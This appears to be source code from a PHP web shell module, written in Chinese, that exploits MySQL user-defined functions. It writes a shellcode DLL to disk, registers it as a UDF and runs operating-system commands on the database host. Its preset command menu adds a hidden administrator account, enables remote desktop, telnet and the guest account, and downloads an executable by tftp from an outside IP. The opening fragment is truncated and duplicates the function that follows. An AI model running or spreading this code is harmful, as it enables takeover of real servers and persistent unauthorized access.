$sqlcmd = 'ver';
 if (isset($_POST['mhost']) && isset($_POST['muser'])) {
     $mhost = $_POST['mhost'];
     $muser = $_POST['muser'];
     $mpass = $_POST['mpass'];
     $mdata = $_POST['mdata'];
     $mport = $_POST['mport'];
     $mpath = File_Str($_POST['mpath']);
     $sqlcmd = $_POST['sqlcmd'];
     $conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass);
     if ($conn) {
         @mysql_select_db($mdata);
         if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) {
             $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
             if (@mysql_query($query, $conn)) {
                 $shellcode = Mysql_shellcode();
                 $query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
                 if (@mysql_query($query, $conn)) {
                     $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';';
                     if (@mysql_query($query, $conn)) {
                         $ap = explode('/', $mpath);
                         $inpath = array_pop($ap);
                         $query = 'Create Function state returns string soname \'' . $inpath . '\';';
                         $MSG_BOX = @mysql_query($query, $conn) ? '安装DLL成功' : '安装DLL失败';
                     } else {
                         $MSG_BOX = '导出DLL文件失败';
                     }
                 } else {
                     $MSG_BOX = '写入临时表失败';
                 }
                 @mysql_query('DROP TABLE Envl_Temp_Tab;', $conn);
function Mysql_m()
{
    $MSG_BOX = '先导出DLL再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.';
    $info = '回显';
    $mhost = 'localhost';
    $muser = '******';
    $mport = '3306';
    $mpass = '';
    $mdata = 'mysql';
    $mpath = 'C:/windows/mysqlDll.dll';
    $sqlcmd = 'ver';
    if (isset($_POST['mhost']) && isset($_POST['muser'])) {
        $mhost = $_POST['mhost'];
        $muser = $_POST['muser'];
        $mpass = $_POST['mpass'];
        $mdata = $_POST['mdata'];
        $mport = $_POST['mport'];
        $mpath = File_Str($_POST['mpath']);
        $sqlcmd = $_POST['sqlcmd'];
        $conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass);
        if ($conn) {
            @mysql_select_db($mdata);
            if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) {
                $query = "CREATE TABLE Spider_Temp_Tab (spider BLOB);";
                if (@mysql_query($query, $conn)) {
                    $shellcode = Mysql_shellcode();
                    $query = "INSERT into Spider_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
                    if (@mysql_query($query, $conn)) {
                        $query = 'SELECT spider FROM Spider_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';';
                        if (@mysql_query($query, $conn)) {
                            $ap = explode('/', $mpath);
                            $inpath = array_pop($ap);
                            $query = 'Create Function state returns string soname \'' . $inpath . '\';';
                            $MSG_BOX = @mysql_query($query, $conn) ? '安装DLL成功' : '安装DLL失败';
                        } else {
                            $MSG_BOX = '导出DLL文件失败';
                        }
                    } else {
                        $MSG_BOX = '写入临时表失败';
                    }
                    @mysql_query('DROP TABLE Spider_Temp_Tab;', $conn);
                } else {
                    $MSG_BOX = '创建临时表失败';
                }
            }
            if (!empty($_POST['runcmd'])) {
                $query = 'select state("' . $sqlcmd . '");';
                $result = @mysql_query($query, $conn);
                if ($result) {
                    $k = 0;
                    $info = NULL;
                    while ($row = @mysql_fetch_array($result)) {
                        $infotmp .= $row[$k];
                        $k++;
                    }
                    $info = $infotmp;
                    $MSG_BOX = '执行成功';
                } else {
                    $MSG_BOX = '执行失败';
                }
            }
        } else {
            $MSG_BOX = '连接MYSQL失败';
        }
    }
    print <<<END
<script language="javascript">
function Fullm(i){
\tStr = new Array(11);
\tStr[0] = "ver";
\tStr[1] = "net user silic silic /add";
\tStr[2] = "net localgroup administrators silic /add";
\tStr[3] = "net start Terminal Services";
\tStr[4] = "netstat -an";
\tStr[5] = "ipconfig";
\tStr[6] = "net user guest /active:yes";
\tStr[7] = "copy c:\\\\1.php d:\\\\2.php";
\tStr[8] = "tftp -i 123.234.222.1 get a.exe c:\\\\a.exe";
\tStr[9] = "net start telnet";
\tStr[10] = "shutdown -r -t 0";
\tmform.sqlcmd.value = Str[i];
\treturn true;
}
</script>
<form method="POST" name="mform" id="mform" action="?s=m">
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<center><div class="actall">
地址 <input type="text" name="mhost" value="{$mhost}" style="width:110px">
端口 <input type="text" name="mport" value="{$mport}" style="width:110px">
用户 <input type="text" name="muser" value="{$muser}" style="width:110px">
密码 <input type="text" name="mpass" value="{$mpass}" style="width:110px">
库名 <input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div><div class="actall">
可加载路径 <input type="text" name="mpath" value="{$mpath}" style="width:555px"> 
<input type="submit" name="outdll" value="安装DLL" style="width:80px;"></div>
<div class="actall">安装成功后可用 <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:515px;">
<select onchange="return Fullm(options[selectedIndex].value)">
<option value="0" selected>--命令集合--</option>
<option value="1">添加管理员</option>
<option value="2">设为管理组</option>
<option value="3">开启远程桌面</option>
<option value="4">查看端口</option>
<option value="5">查看IP</option>
<option value="6">激活guest帐户</option>
<option value="7">复制文件</option>
<option value="8">ftp下载</option>
<option value="9">开启telnet</option>
<option value="10">重启</option>
</select>
<input type="submit" name="runcmd" value="执行" style="width:80px;">
<textarea style="width:720px;height:300px;">{$info}</textarea>
</div></center>
</form>
END;
    return true;
}